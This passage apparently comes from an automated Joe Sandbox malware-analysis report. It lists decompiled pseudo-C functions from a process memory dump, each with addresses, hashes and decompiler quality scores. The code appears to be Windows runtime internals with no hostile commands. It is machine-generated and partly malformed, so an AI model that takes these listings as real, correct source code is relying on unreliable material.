						_t13 = ( *[fs:0x30])[0x50] + 0x22b;
					}
					if(( *_t13 & 0x00000020) == 0) {
						goto L3;
					}
					return E04C47016(0x14a4, _t22, _t23, _a4, _a8, 0);
				} else {
					L3:
					return _t13;
				}
			}






              0x04bcb1e8
              0x04bcb1ea
              0x04bcb1f3
              0x04c24a17
              0x04bcb1f9
              0x04bcb1f9
              0x04bcb1f9
              0x04bcb201
              0x04c24a21
              0x04c24a2e
              0x00000000
              0x00000000
              0x04c24a3b
              0x04c24a4d
              0x04c24a3d
              0x04c24a46
              0x04c24a46
              0x04c24a55
              0x00000000
              0x00000000
              0x00000000
              0x04bcb20a
              0x04bcb20a
              0x04bcb20a
              0x04bcb20a

              Memory Dump Source
              • Source File: 00000011.00000002.499888198.0000000004BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BA0000, based on PE: true
              • Associated: 00000011.00000002.500011272.0000000004CBB000.00000040.00000800.00020000.00000000.sdmpDownload File
              • Associated: 00000011.00000002.500024193.0000000004CBF000.00000040.00000800.00020000.00000000.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_17_2_4ba0000_control.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: d7c926d8f7ad5fed70f9c3145ab0d11368f8906714783f3796a50782a1b3489b
              • Instruction ID: 87a7c4a7d530ddf46e3910e40074d706f1dbd315ad575f1d751facbf122c2453
              • Opcode Fuzzy Hash: d7c926d8f7ad5fed70f9c3145ab0d11368f8906714783f3796a50782a1b3489b
              • Instruction Fuzzy Hash: A0012632204580EBD7268B59E944F697F99EF81354F0840B1F9008B2B1EBB4F800D218
              Uniqueness

              Uniqueness Score: -1.00%

              Function 04C5FE87 Relevance: .0, Instructions: 38COMMON
              Download Yara Rule
              C-Code - Quality: 46%
              			E04C5FE87(intOrPtr __ecx) {
				signed int _v8;
				intOrPtr _v16;
				intOrPtr _v20;
				signed int _v24;
				intOrPtr _v28;
				short _v54;
				char _v60;
				signed char* _t21;
				intOrPtr _t27;
				intOrPtr _t32;
				intOrPtr _t33;
				intOrPtr _t34;
				signed int _t35;

				_v8 =  *0x4cbd360 ^ _t35;
				_v16 = __ecx;
				_v54 = 0x1722;
				_v24 =  *(__ecx + 0x14) & 0x00ffffff;
				_v28 =  *((intOrPtr*)(__ecx + 4));
				_v20 =  *((intOrPtr*)(__ecx + 0xc));
				if(E04BE7D50() == 0) {
					_t21 = 0x7ffe0382;
				} else {
					_t21 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x228;
				}
				_push( &_v60);
				_push(0x10);
				_push(0x20402);
				_push( *_t21 & 0x000000ff);
				return E04C0B640(E04C09AE0(), _t27, _v8 ^ _t35, _t32, _t33, _t34);
			}
















              0x04c5fe96
              0x04c5fe9e
              0x04c5fea1
              0x04c5fead
              0x04c5feb3
              0x04c5feb9
              0x04c5fec3
              0x04c5fed5
              0x04c5fec5
              0x04c5fece
              0x04c5fece
              0x04c5fee0
              0x04c5fee1
              0x04c5fee3
              0x04c5fee8
              0x04c5fefb

              Memory Dump Source
              • Source File: 00000011.00000002.499888198.0000000004BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BA0000, based on PE: true
              • Associated: 00000011.00000002.500011272.0000000004CBB000.00000040.00000800.00020000.00000000.sdmpDownload File
              • Associated: 00000011.00000002.500024193.0000000004CBF000.00000040.00000800.00020000.00000000.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_17_2_4ba0000_control.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: ad6cc5a6ef547dc066c29398bc96c8b009b0d0f9a40ca4913c90b2c4253048cb
              • Instruction ID: 591083141c25b81f56ec0ebd29bfb7440e4ca53fbdf77a1b87f3deedf85c0ff9
              • Opcode Fuzzy Hash: ad6cc5a6ef547dc066c29398bc96c8b009b0d0f9a40ca4913c90b2c4253048cb
              • Instruction Fuzzy Hash: 0F016270A0020CEFCB14DFA8D542A6EB7F4EF04304F1441A9B905DB392EA75EA01DB94
              Uniqueness

              Uniqueness Score: -1.00%

              Function 04C98F6A Relevance: .0, Instructions: 36COMMON
              Download Yara Rule
              C-Code - Quality: 48%
              			E04C98F6A(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				short _v50;
				char _v56;
				signed char* _t18;
				intOrPtr _t24;
				intOrPtr _t30;
				intOrPtr _t31;
				signed int _t32;

				_t29 = __edx;
				_v8 =  *0x4cbd360 ^ _t32;
				_v16 = __ecx;
				_v50 = 0x1c2c;
				_v24 = _a4;
				_v20 = _a8;
				_v12 = __edx;
				if(E04BE7D50() == 0) {
					_t18 = 0x7ffe0386;
				} else {
					_t18 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
				}
				_push( &_v56);
				_push(0x10);
				_push(0x402);
				_push( *_t18 & 0x000000ff);
				return E04C0B640(E04C09AE0(), _t24, _v8 ^ _t32, _t29, _t30, _t31);
			}















              0x04c98f6a
              0x04c98f79
              0x04c98f81
              0x04c98f84
              0x04c98f8b
              0x04c98f91
              0x04c98f94
              0x04c98f9e
              0x04c98fb0
              0x04c98fa0
              0x04c98fa9
              0x04c98fa9
              0x04c98fbb
              0x04c98fbc
              0x04c98fbe
              0x04c98fc3
              0x04c98fd6

              Memory Dump Source
              • Source File: 00000011.00000002.499888198.0000000004BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BA0000, based on PE: true
              • Associated: 00000011.00000002.500011272.0000000004CBB000.00000040.00000800.00020000.00000000.sdmpDownload File
              • Associated: 00000011.00000002.500024193.0000000004CBF000.00000040.00000800.00020000.00000000.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_17_2_4ba0000_control.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 7ac1e9a7cefac088317f6f85ac4da9b810ac6507374960b0bf0b1dbf8385b9ce
              • Instruction ID: 316bfd83347eeef43374cd93070bba46fee721e89d5db2bd693fe90908a44ffb
              • Opcode Fuzzy Hash: 7ac1e9a7cefac088317f6f85ac4da9b810ac6507374960b0bf0b1dbf8385b9ce
              • Instruction Fuzzy Hash: E3014474A0020CAFDB04EFA9D545AAEB7F5EF48700F108069B905EB381EB74EE00DB94
              Uniqueness

              Uniqueness Score: -1.00%

              Function 04C8131B Relevance: .0, Instructions: 36COMMON
              Download Yara Rule
              C-Code - Quality: 48%
              			E04C8131B(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				short _v50;
				char _v56;
				signed char* _t18;
				intOrPtr _t24;
				intOrPtr _t30;
				intOrPtr _t31;
				signed int _t32;

				_t29 = __edx;
				_v8 =  *0x4cbd360 ^ _t32;
				_v20 = _a4;
				_v12 = _a8;
				_v24 = __ecx;
				_v16 = __edx;
				_v50 = 0x1021;
				if(E04BE7D50() == 0) {
					_t18 = 0x7ffe0380;
				} else {
					_t18 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
				}
				_push( &_v56);
				_push(0x10);
				_push(0x20402);
				_push( *_t18 & 0x000000ff);
				return E04C0B640(E04C09AE0(), _t24, _v8 ^ _t32, _t29, _t30, _t31);
			}















              0x04c8131b
              0x04c8132a
              0x04c81330
              0x04c81336
              0x04c8133e
              0x04c81341
              0x04c81344
              0x04c8134f
              0x04c81361
              0x04c81351
              0x04c8135a
              0x04c8135a
              0x04c8136c
              0x04c8136d
              0x04c8136f
              0x04c81374
              0x04c81387

              Memory Dump Source
              • Source File: 00000011.00000002.499888198.0000000004BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BA0000, based on PE: true
              • Associated: 00000011.00000002.500011272.0000000004CBB000.00000040.00000800.00020000.00000000.sdmpDownload File
              • Associated: 00000011.00000002.500024193.0000000004CBF000.00000040.00000800.00020000.00000000.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_17_2_4ba0000_control.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: fadaa4bdc61b632f3a63bc51ec82625512bc0b230d8ed6c4860b3abea991dd40
              • Instruction ID: f0cb928bfb51c2f18f56d513b86c429a602adbfd9898477a454bdd38ff96feb8
              • Opcode Fuzzy Hash: fadaa4bdc61b632f3a63bc51ec82625512bc0b230d8ed6c4860b3abea991dd40
              • Instruction Fuzzy Hash: 03013171A0120CAFDB04EFA9D545AAEB7F5FF48704F048069B945EB381EA74EE00DB54
              Uniqueness

              Uniqueness Score: -1.00%

              Function 04BEC577 Relevance: .0, Instructions: 33COMMON
              Download Yara Rule
              C-Code - Quality: 100%
              			E04BEC577(void* __ecx, char _a4) {
				void* __esi;
				void* __ebp;
				void* _t17;
				void* _t19;
				void* _t20;
				void* _t21;

				_t18 = __ecx;
				_t21 = __ecx;
				if(__ecx == 0 ||  *((char*)(__ecx + 0xdd)) != 0 || E04BEC5D5(__ecx, _t19) == 0 ||  *((intOrPtr*)(__ecx + 4)) != 0x4ba11cc ||  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28)) != 0) {
					__eflags = _a4;
					if(__eflags != 0) {
						L10:
						E04C988F5(_t17, _t18, _t19, _t20, _t21, __eflags);
						L9:
						return 0;
					}
					__eflags =  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28));
					if(__eflags == 0) {
						goto L10;
					}
					goto L9;
				} else {
					return 1;
				}
			}









              0x04bec577
              0x04bec57d
              0x04bec581
              0x04bec5b5
              0x04bec5b9
              0x04bec5ce
              0x04bec5ce
              0x04bec5ca
              0x00000000
              0x04bec5ca
              0x04bec5c4
              0x04bec5c8
              0x00000000
              0x00000000
              0x00000000
              0x04bec5ad
              0x00000000
              0x04bec5af

              Memory Dump Source
              • Source File: 00000011.00000002.499888198.0000000004BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BA0000, based on PE: true
              • Associated: 00000011.00000002.500011272.0000000004CBB000.00000040.00000800.00020000.00000000.sdmpDownload File
              • Associated: 00000011.00000002.500024193.0000000004CBF000.00000040.00000800.00020000.00000000.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_17_2_4ba0000_control.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 0a0187ffdaefc4fb147770d8e9a783aaba7508fea8fc7e620bd9cbad8506530e
              • Instruction ID: 3a81addab07da469c7430c5f28006384ab6bdf4e4e777e73f393bc38c30e70d9
              • Opcode Fuzzy Hash: 0a0187ffdaefc4fb147770d8e9a783aaba7508fea8fc7e620bd9cbad8506530e
              • Instruction Fuzzy Hash: F6F09AB2A156909EE7329B2A800AB327FF8DB85774F5484E6D41687202C7A8F880C351
              Uniqueness

              Uniqueness Score: -1.00%

              Function 04C82073 Relevance: .0, Instructions: 32COMMON
              Download Yara Rule
              C-Code - Quality: 94%
              			E04C82073(void* __ebx, void* __ecx, void* __edi, void* __eflags) {
				void* __esi;
				signed char _t3;
				signed char _t7;
				void* _t19;

				_t17 = __ecx;
				_t3 = E04C7FD22(__ecx);
				_t19 =  *0x4cb849c - _t3; // 0x0
				if(_t19 == 0) {
					__eflags = _t17 -  *0x4cb8748; // 0x0
					if(__eflags <= 0) {
						E04C81C06();
						_t3 =  *((intOrPtr*)( *[fs:0x30] + 2));
						__eflags = _t3;
						if(_t3 != 0) {
							L5:
							__eflags =  *0x4cb8724 & 0x00000004;
							if(( *0x4cb8724 & 0x00000004) == 0) {
								asm("int3");
								return _t3;
							}
						} else {
							_t3 =  *0x7ffe02d4 & 0x00000003;
							__eflags = _t3 - 3;
							if(_t3 == 3) {
								goto L5;
							}
						}
					}
					return _t3;
				} else {
					_t7 =  *0x4cb8724; // 0x0
					return E04C78DF1(__ebx, 0xc0000374, 0x4cb5890, __edi, __ecx,  !_t7 >> 0x00000002 & 0x00000001,  !_t7 >> 0x00000002 & 0x00000001);
				}
			}







              0x04c82076
              0x04c82078
              0x04c8207d
              0x04c82083
              0x04c820a4
              0x04c820aa
              0x04c820ac
              0x04c820b7
              0x04c820ba
              0x04c820bc
              0x04c820c9
              0x04c820c9
              0x04c820d0
              0x04c820d2
              0x00000000
              0x04c820d2
              0x04c820be
              0x04c820c3
              0x04c820c5
              0x04c820c7
              0x00000000
              0x00000000
              0x04c820c7
              0x04c820bc
              0x04c820d4
              0x04c82085
              0x04c82085
              0x04c820a3
              0x04c820a3

              Memory Dump Source
              • Source File: 00000011.00000002.499888198.0000000004BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BA0000, based on PE: true
              • Associated: 00000011.00000002.500011272.0000000004CBB000.00000040.00000800.00020000.00000000.sdmpDownload File
              • Associated: 00000011.00000002.500024193.0000000004CBF000.00000040.00000800.00020000.00000000.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_17_2_4ba0000_control.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 9914cdcdbaedaf8aace028c047650a61fd1b7a77b0b4db97dba714cb7ea59fba
              • Instruction ID: 891f06e06ddb6de26ae3d0a1c3945e2d4be09b7753e289e1147f028ca599e702
              • Opcode Fuzzy Hash: 9914cdcdbaedaf8aace028c047650a61fd1b7a77b0b4db97dba714cb7ea59fba
              • Instruction Fuzzy Hash: 0EF0A07A4151844BFF32BF2575193E23B9AD75621CF1E54CAE89027200CA39AE83DBB4
              Uniqueness

              Uniqueness Score: -1.00%

              Function 04C98D34 Relevance: .0, Instructions: 32COMMON
              Download Yara Rule
              C-Code - Quality: 43%
              			E04C98D34(intOrPtr __ecx, intOrPtr __edx) {
				signed int _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				short _v42;
				char _v48;
				signed char* _t12;
				intOrPtr _t18;
				intOrPtr _t24;
				intOrPtr _t25;
				signed int _t26;

				_t23 = __edx;
				_v8 =  *0x4cbd360 ^ _t26;
				_v16 = __ecx;
				_v42 = 0x1c2b;
				_v12 = __edx;
				if(E04BE7D50() == 0) {
					_t12 = 0x7ffe0386;
				} else {
					_t12 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
				}
				_push( &_v48);
				_push(8);
				_push(0x20402);
				_push( *_t12 & 0x000000ff);
				return E04C0B640(E04C09AE0(), _t18, _v8 ^ _t26, _t23, _t24, _t25);
			}













              0x04c98d34
              0x04c98d43
              0x04c98d4b
              0x04c98d4e
              0x04c98d52
              0x04c98d5c
              0x04c98d6e
              0x04c98d5e
              0x04c98d67
              0x04c98d67
              0x04c98d79
              0x04c98d7a
              0x04c98d7c
              0x04c98d81
              0x04c98d94

              Memory Dump Source
              • Source File: 00000011.00000002.499888198.0000000004BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BA0000, based on PE: true
              • Associated: 00000011.00000002.500011272.0000000004CBB000.00000040.00000800.00020000.00000000.sdmpDownload File
              • Associated: 00000011.00000002.500024193.0000000004CBF000.00000040.00000800.00020000.00000000.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_17_2_4ba0000_control.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 2dbfd02b2c82b21baf98035be3aabba1a61f38a859831a5f0799804972aeafad
              • Instruction ID: 17cea7b855fc7c14c97c249b56178c6684ccc2c844ecb5692d31a433aa4eec5f
              • Opcode Fuzzy Hash: 2dbfd02b2c82b21baf98035be3aabba1a61f38a859831a5f0799804972aeafad
              • Instruction Fuzzy Hash: 51F0B470E0460CAFDB04EFB9D445B6EB7B5EF04700F1480A9E905EB281EA34ED00D754
              Uniqueness

              Uniqueness Score: -1.00%

              Function 04C0927A Relevance: .0, Instructions: 32COMMON
              Download Yara Rule
              C-Code - Quality: 54%
              			E04C0927A(void* __ecx) {
				signed int _t11;
				void* _t14;

				_t11 = L04BE4620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 0x98);
				if(_t11 != 0) {
					E04C0FA60(_t11, 0, 0x98);
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					 *(_t11 + 0x1c) =  *(_t11 + 0x1c) & 0x00000000;
					 *((intOrPtr*)(_t11 + 0x24)) = 1;
					E04C092C6(_t11, _t14);
				}
				return _t11;
			}





              0x04c09295
              0x04c09299
              0x04c0929f
              0x04c092aa
              0x04c092ad
              0x04c092ae
              0x04c092af
              0x04c092b0
              0x04c092b4
              0x04c092bb
              0x04c092bb
              0x04c092c5

              Memory Dump Source
              • Source File: 00000011.00000002.499888198.0000000004BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BA0000, based on PE: true
              • Associated: 00000011.00000002.500011272.0000000004CBB000.00000040.00000800.00020000.00000000.sdmpDownload File
              • Associated: 00000011.00000002.500024193.0000000004CBF000.00000040.00000800.00020000.00000000.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_17_2_4ba0000_control.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: fb98b62dac83db7e13ee253788b92f70b835eb404f2827a387eedf494df67516
              • Instruction ID: 4c49cfec22e8e4b4bead85ff433b48f7363d494d7ea301336d3a674e363a12e6
              • Opcode Fuzzy Hash: fb98b62dac83db7e13ee253788b92f70b835eb404f2827a387eedf494df67516
              • Instruction Fuzzy Hash: 07E065722405406BE7219E56DC84B57765EDF82725F048079B5045E282C6F5E90987A4
              Uniqueness

              Uniqueness Score: -1.00%

              Function 04C98CD6 Relevance: .0, Instructions: 31COMMON
              Download Yara Rule
              C-Code - Quality: 36%
              			E04C98CD6(intOrPtr __ecx) {
				signed int _v8;
				intOrPtr _v12;
				short _v38;
				char _v44;
				signed char* _t11;
				intOrPtr _t17;
				intOrPtr _t22;
				intOrPtr _t23;
				intOrPtr _t24;
				signed int _t25;

				_v8 =  *0x4cbd360 ^ _t25;
				_v12 = __ecx;
				_v38 = 0x1c2d;
				if(E04BE7D50() == 0) {
					_t11 = 0x7ffe0386;
				} else {
					_t11 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
				}
				_push( &_v44);
				_push(0xffffffe4);
				_push(0x402);
				_push( *_t11 & 0x000000ff);
				return E04C0B640(E04C09AE0(), _t17, _v8 ^ _t25, _t22, _t23, _t24);
			}













              0x04c98ce5
              0x04c98ced
              0x04c98cf0
              0x04c98cfb
              0x04c98d0d
              0x04c98cfd
              0x04c98d06
              0x04c98d06
              0x04c98d18
              0x04c98d19
              0x04c98d1b
              0x04c98d20
              0x04c98d33

              Memory Dump Source
              • Source File: 00000011.00000002.499888198.0000000004BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BA0000, based on PE: true
              • Associated: 00000011.00000002.500011272.0000000004CBB000.00000040.00000800.00020000.00000000.sdmpDownload File
              • Associated: 00000011.00000002.500024193.0000000004CBF000.00000040.00000800.00020000.00000000.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_17_2_4ba0000_control.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 7cc5ac6b531ae13d7899725aa4804a494a8dc4f5e179b68c2083bb968fdfd1de
              • Instruction ID: cf6e40cb6c0083910df2c4f434c3d6a843c71b160972c4044577c462ece11977
              • Opcode Fuzzy Hash: 7cc5ac6b531ae13d7899725aa4804a494a8dc4f5e179b68c2083bb968fdfd1de
              • Instruction Fuzzy Hash: 4EF08271A04209ABDB04EBA9E945E6E77B4EF49304F1441A9F916EB2C1EA34ED00D754
              Uniqueness

              Uniqueness Score: -1.00%

              Function 04BE746D Relevance: .0, Instructions: 31COMMON
              Download Yara Rule
              C-Code - Quality: 88%
              			E04BE746D(short* __ebx, void* __ecx, void* __edi, intOrPtr __esi) {
				signed int _t8;
				void* _t10;
				short* _t17;
				void* _t19;
				intOrPtr _t20;
				void* _t21;

				_t20 = __esi;
				_t19 = __edi;
				_t17 = __ebx;
				if( *((char*)(_t21 - 0x25)) != 0) {
					if(__ecx == 0) {
						E04BDEB70(__ecx, 0x4cb79a0);
					} else {
						asm("lock xadd [ecx], eax");
						if((_t8 | 0xffffffff) == 0) {
							_push( *((intOrPtr*)(__ecx + 4)));
							E04C095D0();
							L04BE77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0,  *((intOrPtr*)(_t21 - 0x50)));
							_t17 =  *((intOrPtr*)(_t21 - 0x2c));
							_t20 =  *((intOrPtr*)(_t21 - 0x3c));
						}
					}
					L10:
				}
				_t10 = _t19 + _t19;
				if(_t20 >= _t10) {
					if(_t19 != 0) {
						 *_t17 = 0;
						return 0;
					}
				}
				return _t10;
				goto L10;
			}









              0x04be746d
              0x04be746d
              0x04be746d
              0x04be7471
              0x04be7488
              0x04c2f92d
              0x04be748e
              0x04be7491
              0x04be7495
              0x04c2f937
              0x04c2f93a
              0x04c2f94e
              0x04c2f953
              0x04c2f956
              0x04c2f956
              0x04be7495
              0x00000000
              0x04be7488
              0x04be7473
              0x04be7478
              0x04be747d
              0x04be7481
              0x00000000
              0x04be7481
              0x04be747d
              0x04be747a
              0x00000000

              Memory Dump Source
              • Source File: 00000011.00000002.499888198.0000000004BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BA0000, based on PE: true
              • Associated: 00000011.00000002.500011272.0000000004CBB000.00000040.00000800.00020000.00000000.sdmpDownload File
              • Associated: 00000011.00000002.500024193.0000000004CBF000.00000040.00000800.00020000.00000000.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_17_2_4ba0000_control.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: efd2088a359f63f2582127c4250dfee39a930e17bbe428808da77e277d397b54
              • Instruction ID: 8c10aaa280337608a7dfd079c581f78e319a2ec78a217280f30912caa17d1ede
              • Opcode Fuzzy Hash: efd2088a359f63f2582127c4250dfee39a930e17bbe428808da77e277d397b54
              • Instruction Fuzzy Hash: F3F0E934A01158AADF11EB6EC540F797FB2AF84314F0403D5E891AB160FF65F800D785
              Uniqueness

              Uniqueness Score: -1.00%

              Function 04C98B58 Relevance: .0, Instructions: 31COMMON
              Download Yara Rule
              C-Code - Quality: 36%
              			E04C98B58(intOrPtr __ecx) {
				signed int _v8;
				intOrPtr _v20;
				short _v46;
				char _v52;
				signed char* _t11;
				intOrPtr _t17;
				intOrPtr _t22;
				intOrPtr _t23;
				intOrPtr _t24;
				signed int _t25;

				_v8 =  *0x4cbd360 ^ _t25;
				_v20 = __ecx;
				_v46 = 0x1c26;
				if(E04BE7D50() == 0) {
					_t11 = 0x7ffe0386;
				} else {
					_t11 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
				}
				_push( &_v52);
				_push(4);
				_push(0x402);
				_push( *_t11 & 0x000000ff);
				return E04C0B640(E04C09AE0(), _t17, _v8 ^ _t25, _t22, _t23, _t24);
			}













              0x04c98b67
              0x04c98b6f
              0x04c98b72
              0x04c98b7d
              0x04c98b8f
              0x04c98b7f
              0x04c98b88
              0x04c98b88
              0x04c98b9a
              0x04c98b9b
              0x04c98b9d
              0x04c98ba2
              0x04c98bb5

              Memory Dump Source
              • Source File: 00000011.00000002.499888198.0000000004BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BA0000, based on PE: true
              • Associated: 00000011.00000002.500011272.0000000004CBB000.00000040.00000800.00020000.00000000.sdmpDownload File
              • Associated: 00000011.00000002.500024193.0000000004CBF000.00000040.00000800.00020000.00000000.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_17_2_4ba0000_control.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 5119f9e520efa3849c34c87730adf99ff73d03851ef3f1a2febf06a268674d88
              • Instruction ID: ba546419df9ebacc7c73e3ef2215bd18f210c696e62e7c57e575124cc21fc25a
              • Opcode Fuzzy Hash: 5119f9e520efa3849c34c87730adf99ff73d03851ef3f1a2febf06a268674d88
              • Instruction Fuzzy Hash: C2F082B0A14258ABEB04EBA9D906E7EB3B5EF04304F4444A9BA05DB3C1FB74ED00D794
              Uniqueness

              Uniqueness Score: -1.00%

              Function 04BC4F2E Relevance: .0, Instructions: 31COMMON
              Download Yara Rule
              C-Code - Quality: 100%
              			E04BC4F2E(void* __ecx, char _a4) {
				void* __esi;
				void* __ebp;
				void* _t17;
				void* _t19;
				void* _t20;
				void* _t21;

				_t18 = __ecx;
				_t21 = __ecx;
				if(__ecx == 0) {
					L6:
					__eflags = _a4;
					if(__eflags != 0) {
						L8:
						E04C988F5(_t17, _t18, _t19, _t20, _t21, __eflags);
						L9:
						return 0;
					}
					__eflags =  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28));
					if(__eflags != 0) {
						goto L9;
					}
					goto L8;
				}
				_t18 = __ecx + 0x30;
				if(E04BEC5D5(__ecx + 0x30, _t19) == 0 ||  *((intOrPtr*)(__ecx + 0x34)) != 0x4ba1030 ||  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28)) != 0) {
					goto L6;
				} else {
					return 1;
				}
			}









              0x04bc4f2e
              0x04bc4f34
              0x04bc4f38
              0x04c20b85
              0x04c20b85
              0x04c20b89
              0x04c20b9a
              0x04c20b9a
              0x04c20b9f
              0x00000000
              0x04c20b9f
              0x04c20b94
              0x04c20b98
              0x00000000
              0x00000000
              0x00000000
              0x04c20b98
              0x04bc4f3e
              0x04bc4f48
              0x00000000
              0x04bc4f6e
              0x00000000
              0x04bc4f70

              Memory Dump Source
              • Source File: 00000011.00000002.499888198.0000000004BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BA0000, based on PE: true
              • Associated: 00000011.00000002.500011272.0000000004CBB000.00000040.00000800.00020000.00000000.sdmpDownload File
              • Associated: 00000011.00000002.500024193.0000000004CBF000.00000040.00000800.00020000.00000000.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_17_2_4ba0000_control.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 7b8fdbe51fc1fe9df77429c103a8db9b60257458cc0e23c389a67b339436f77c
              • Instruction ID: 40802ca9912e72643cd46dff5aae48cc7e12401a65c65b59a286f434e73596da
              • Opcode Fuzzy Hash: 7b8fdbe51fc1fe9df77429c103a8db9b60257458cc0e23c389a67b339436f77c
              • Instruction Fuzzy Hash: B5F0E2325256A89FE771DB2AC284B22B7E7FB017B8F0444A6D50587920C7B4FE40C690
              Uniqueness

              Uniqueness Score: -1.00%

              Function 04BCF358 Relevance: .0, Instructions: 28COMMON
              Download Yara Rule
              C-Code - Quality: 79%
              			E04BCF358(void* __ecx, signed int __edx) {
				char _v8;
				signed int _t9;
				void* _t20;

				_push(__ecx);
				_t9 = 2;
				_t20 = 0;
				if(E04BFF3D5( &_v8, _t9 * __edx, _t9 * __edx >> 0x20) >= 0 && _v8 != 0) {
					_t20 = L04BE4620( &_v8,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v8);
				}
				return _t20;
			}






              0x04bcf35d
              0x04bcf361
              0x04bcf367
              0x04bcf372
              0x04bcf38c
              0x04bcf38c
              0x04bcf394

              Memory Dump Source
              • Source File: 00000011.00000002.499888198.0000000004BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BA0000, based on PE: true
              • Associated: 00000011.00000002.500011272.0000000004CBB000.00000040.00000800.00020000.00000000.sdmpDownload File
              • Associated: 00000011.00000002.500024193.0000000004CBF000.00000040.00000800.00020000.00000000.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_17_2_4ba0000_control.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 61dda8323ae8c861ea8f02d60a1be81a40b0a62d8b7407e3baae4fe75ca8acd3
              • Instruction ID: a4133e145225915708660912cf04fb8224e76b55bc8a429bdc96729d9ad1be7a
              • Opcode Fuzzy Hash: 61dda8323ae8c861ea8f02d60a1be81a40b0a62d8b7407e3baae4fe75ca8acd3
              • Instruction Fuzzy Hash: 3CE0D832A40118FFDB3196D99D05FBABBADDB84B60F0001D6B904DB190D570AD00C6D0
              Uniqueness

              Uniqueness Score: -1.00%

              Function 04BDFF60 Relevance: .0, Instructions: 22COMMON
              Download Yara Rule
              C-Code - Quality: 100%
              			E04BDFF60(intOrPtr _a4) {
				void* __ecx;
				void* __ebp;
				void* _t13;
				intOrPtr _t14;
				void* _t15;
				void* _t16;
				void* _t17;

				_t14 = _a4;
				if(_t14 == 0 || ( *(_t14 + 0x68) & 0x00030000) != 0 ||  *((intOrPtr*)(_t14 + 4)) != 0x4ba11a4 ||  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28)) != 0) {
					return E04C988F5(_t13, _t14, _t15, _t16, _t17, __eflags);
				} else {
					return E04BE0050(_t14);
				}
			}










              0x04bdff66
              0x04bdff6b
              0x00000000
              0x04bdff8f
              0x00000000
              0x04bdff8f

              Memory Dump Source
              • Source File: 00000011.00000002.499888198.0000000004BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BA0000, based on PE: true
              • Associated: 00000011.00000002.500011272.0000000004CBB000.00000040.00000800.00020000.00000000.sdmpDownload File
              • Associated: 00000011.00000002.500024193.0000000004CBF000.00000040.00000800.00020000.00000000.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_17_2_4ba0000_control.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
